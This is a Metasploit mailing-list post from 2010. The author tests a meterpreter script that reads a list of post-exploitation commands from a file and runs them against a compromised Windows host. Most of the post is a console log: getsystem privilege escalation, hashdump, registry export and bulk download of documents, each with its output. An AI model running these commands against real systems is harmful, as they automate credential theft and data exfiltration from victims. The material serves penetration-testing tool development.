Home page logo

metasploit logo Metasploit mailing list archives

multi_console_command script testdrive
From: Sherif El-Deeb <archeldeeb () gmail com>
Date: Sat, 24 Apr 2010 20:24:21 +0300

The multi_console_command script has been added as an answer to a request to
run multiple meterpreter commands from a file, It's working perfectly "as
expected of course" :)

This script, IMHO, is the most useful one for post exploitation automation.

Thank you Carlos, yet again.


msf exploit(handler) > cat /root/test.rc
[*] exec: cat /root/test.rc

use priv
run hashdump
run scraper
run search_dwld c:\\ free '.(jpg|doc|docx|xls|xlsx|pdf)$'

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > run multi_console_command -s /root/test.rc
[*] Running Command List ...
[*]     Running command screenshot
Screenshot saved to: /root/FFsygzcJ.jpeg
[*]     Running command use priv
[*]     Running command getsystem
...got system (via technique 1).
[*]     Running command run hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...
[*]     Running command run scraper
[*] New session on xx.211.145.145:54276...
[*] Gathering basic system information...
[*] Error dumping hashes: Rex::Post::Meterpreter::RequestError
priv_passwd_get_sam_hashes: Operation failed: 87
[*] Obtaining the entire registry...
[*]  Exporting HKCU
[*]  Downloading HKCU (C:\Users\SHERIF~1\AppData\Local\Temp\LwPhbvul.reg)
[*]     Running command rev2self
[*]     Running command run search_dwld c:\\ free

Downloading 'c:\\1.jpg' to '/tmp/c_1.jpg'

meterpreter > run checkvm
[*] Checking if target is a Virtual Machine .....
[*] It appears to be physical host.
meterpreter >

checkvm is fine.

Side note: I noticed that the hash dumping process in the scraper script is
not successful, even with system privs. "VistaSP2_x86", that's why I usually
use "run hashdump" which works just fine.

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]